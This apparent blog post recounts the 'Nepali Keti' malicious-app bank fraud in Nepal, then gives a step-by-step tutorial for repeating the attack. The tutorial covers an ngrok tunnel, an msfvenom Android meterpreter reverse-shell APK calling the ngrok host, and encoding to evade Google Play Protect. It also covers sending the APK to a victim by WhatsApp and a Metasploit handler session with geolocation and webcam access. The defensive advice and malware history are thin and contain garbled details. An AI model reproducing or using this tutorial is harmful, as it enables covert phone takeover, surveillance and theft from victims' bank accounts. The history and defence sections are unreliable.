Nepali Keti — A Goliath Scam

8 min readApr 24, 2023

Overview of the Attack on Nepali Keti

Several people were detained in Nepal when it was claimed that they used the “Nepali Keti” mobile app to get into bank accounts and steal money. A Nepali national who lives in Australia created the app, which was promoted as a method for Nepali women to meet new people and potential relationships. The suspects used the application to get private data, such as bank account numbers, passwords, and OTPs, which they then used to commit crimes. The victims were apprehended by the police when a victim reported that a sizable sum of money had been taken. The need to exercise caution while utilizing technology to handle personal information is highlighted by this occurrence.

Impact of The Attack

Cyberattacks against banks have the potential to significantly affect their daily operations, public image, and financial viability. They may lead to the theft of private client data, money losses, and service interruptions. A successful hack can harm a bank’s brand, and reduce consumer trust, in addition to causing financial losses. Legal obligations, as well as regulatory penalties, are possible outcomes. Banks must make significant investments in cybersecurity defenses, carry out regular security audits, and train staff and clients on the best online safety practices to lessen the effects of cyberattacks.

Bank customers’ financial security, personal information, and privacy may all be seriously affected by data breaches. Sensitive information theft can result in identity theft and fraud, which can have long-lasting effects on the victims’ financial stability. Such sensitive information includes social security numbers, account information, and personal identification information. In addition, the invasion of their privacy and misuse of their personal information may cause emotional discomfort and worry in the victims.

Eight people previously reported the group to the Cyber Bureau, while 12 people earlier reported the gang to the Kathmandu Valley Crime Investigation Office. A complaint was made against the Bureau and the Kathmandu Crime Investigation Office for a combined fraud of Rs 2.6 million and Rs 2 million.

Therefore, be careful the next time; otherwise, it will be tough for you to afford your next date😏

Root Causes and Motives behind the Attack on Nepali Keti

A lack of awareness of cyberattacks, vulnerable profiles, and a lack of security initiatives have been identified as the root cause of this disastrous incident. Police have apprehended eight individuals who withdrew hundreds of thousands of rupees by hacking bank accounts using a malicious app called “Nepali Keti”. These hackers could access vital information and exploit it to empty accounts, resulting in egregious violations of trust and security. Multiple banks have reported customers suffering financial and data losses. The warning highlights the severity of the issue and the urgent need for action to address it.

The organisation, according to the authorities, has access to anyone who opens the app and uses that information to empty bank accounts. With the intention of gaining sensitive information like credit card numbers, personal information, or login passwords in order to access bank accounts, steal money, or demand ransom payments, hackers may target specific people, businesses, or financial institutions.

Hands On How To Do This Kind Of Attack

First of all create a Ngrok account and download it on your system. (Ngrok is a service where you can host your payload).
Using Ngrok create a secure tunnel with port number 4444

┌──(root㉿kali)-[~]
└─$ ngrok tcp 4444
ngrok                                                                                                                                                                        (Ctrl+C to quit)
                                                                                                                                                                                             
Announcing ngrok-rs: The ngrok agent as a Rust crate: <https://ngrok.com/rust>                                                                                                                 
                                                                                                                                                                                             
Session Status                online                                                                                                                                                         
Account                       ***** (Plan: Free)                                                                                                                                           
Update                        update available (version 3.2.2, Ctrl-U to update)                                                                                                             
Version                       3.1.0                                                                                                                                                          
Region                        *********                                                                                                                                                    
Latency                       26ms                                                                                                                                                           
Web Interface                 <http://127.0.0.1:4040>                                                                                                                                          
Forwarding                    tcp://0.tcp.in.ngrok.io:14976 -> localhost:4444                                                                                                                
                                                                                                                                                                                             
Connections                   ttl     opn     rt1     rt5     p50     p90                                                                                                                    
                              2       0       0.00    0.00    194.44  356.27

3. Now use MSFVENOM to create a payload

┌──(kali㉿kali)-[~]
└─$ msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.in.ngrok.io LPORT=14976 R> Nepali_Keti.apk 
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 10242 bytes

-p is for your payload as you can see we are using the android one.

LHOST is where it will be hosted and LPORT is the port number where it will be hosted.

R is for format which we have specified here as an apk file.

→ You can also encode the program to avoid google play protect detection.

4. You will have an apk file which you can send to your victim through whatsapp or any other medium.

5. After installing the payload it will require permission which need to be given from victim side.

6. After this step, use msfconsole and select a payload handler.

┌──(kali㉿kali)-[~]
└─$ msfconsole                                                                                        
                                                  
IIIIII    dTb.dTb        _.---._
  II     4'  v  'B   .'"".'/|\\`.""'.
  II     6.     .P  :  .' / | \\ `.  :
  II     'T;. .;P'  '.'  /  |  \\  `.'
  II      'T; ;P'    `. /   |   \\ .'
IIIIII     'YvP'       `-.__|__.-'

I love shells --egypt
       =[ metasploit v6.3.4-dev                           ]
+ -- --=[ 2294 exploits - 1201 auxiliary - 409 post       ]
+ -- --=[ 968 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: View all productivity tips with the 
tips command
Metasploit Documentation: <https://docs.metasploit.com/>

msf6 > use exploit/multi/handler

[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) >

7. Set the payload along with LHOST and LPORT

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) >

8. Now run the payload

msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 0.0.0.0:4444 
[*] Sending stage (78189 bytes) to 127.0.0.1
[*] Sending stage (78189 bytes) to 127.0.0.1
[-] Failed to load client portion of stdapi.
[*] Meterpreter session 2 opened (127.0.0.1:4444 -> 127.0.0.1:36462) at 2023-04-16 03:34:33 -0400
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:36458) at 2023-04-16 03:34:33 -0400

9. Its the ‘Access Granted’ scene. You can see what all things you can do using the help command.

10. For example, I will use geolocate and webcam_list over here.

meterpreter > geolocate
[*] Current Location:
        Latitude:  22.8271289
        Longitude: 90.0495526

To get the address: <https://maps.googleapis.com/maps/api/geocode/json?latlng=22.8271289,90.0495526&sensor=true>
meterpreter > webcam_list

1: Back Camera
2: Front Camera

Best Practices to Protect from Such Attacks

Multi-Factor Authentication(MFA) — Implementing a robust multi-factor authentication mechanism while downloading an APK file is one of the most effective measures. We can also use mobile devices’ hardware characteristics, which makes stealing identifiers much more difficult.
Monitoring for fraud and suspicious activities across many channels — Banks can use the enterprise view and fraud reporting function to aggregate information from many sources and channels to understand a customer’s account and any unusual activity. There will be checks, online account access, and electronic payments. Advanced scoring models, consumer profiling, and other fraud detection technologies are used by a function called machine learning, scores, rules, and alerts to produce risk assessments for a client account. There are two advanced transaction monitoring systems: Simility and IBM Safer Payments.
Safety checks for any APK that gets to you through social media. This will give us a risk calculation of whether the package is safe.
Regular malware inspection and removal — Customers and even bank workers have fallen for scams that trick them into visiting websites that install malicious software on their computers, enabling thieves to make off with enormous quantities of money. By infecting a computer or mobile device with this malware, a hacker can monitor keystrokes, view emails, take screenshots, and steal crucial data that gives them access to money. Banks must use the latest security tools to find and eliminate this harmful virus.
Consumer email and text alerts — One particularly effective fraud detection strategy alerts customers when their mobile device accounts have experienced spontaneous activity. Suppose an electronic payment is made to a new payee, for example. In that case, the bank may send a text message to the consumer asking for confirmation that the transaction is authentic. This method has been shown to be beneficial in preventing fraud and improving client trust.

Similar Incidents of Attack

In the cyber world, nothing is indeed one hundred percent secure, and that’s true.

The Mobile was introduced in the 1970s and was the greatest invention of time. Although it was a great invention, it needed to be more secure. So it was in 2004 the first malware for mobile phones got identified. Since then, new viruses have continued to be recognized, perpetuating an ongoing trend.

Given below is the list of some mobile phone malware.

Cabir(2004) → Cabir is the name of a computer worm developed in 2004 which was designed to infect mobile phones running the Symbian Operating system(Symbian 60 in particular). It is believed to be the first computer worm that can infect mobile phones. When a phone is infected with Cabir, the message “Carib” is displayed on the phone’s display and is displayed every time the phone is turned on. The worm then attempts to spread to other phones in the area using wireless Bluetooth signals. The biggest issue is the phone’s battery running down quickly due to the constant use of Bluetooth and the frequent prompt messages from Caribe.
FakePlayer(2010) → In October 2010, the FakePlayer Trojan made the leap from PCs to smartphones, infecting Android users by hiding in a media player app called “Movie Player”. Disguised in a media player application, FakePlayer was sending SMS messages at 3353 and 3354, each costing about $5. The application of this virus is approximately 13 KB. It will be active when the user is running the media player application. It has default Android extensions GER(FILE FORMAT). It was the first virus involved in the victim’s money loss.

References

Article:-

Eight arrested for hacking bank accounts using ‘Nepali Keti’ app

Contribution

Writers:-

Akshay Raj | Sudoer

Mehul Dadlani | Binary

Nasir Hussain | Binary

Gurupreet Singh | Binary

Khushi Tiwari | Binary

Nawnit Singh | Binary

Designers:-

Abhinav Shandilya | Sudoer

Omar Ansari | Sticky Bit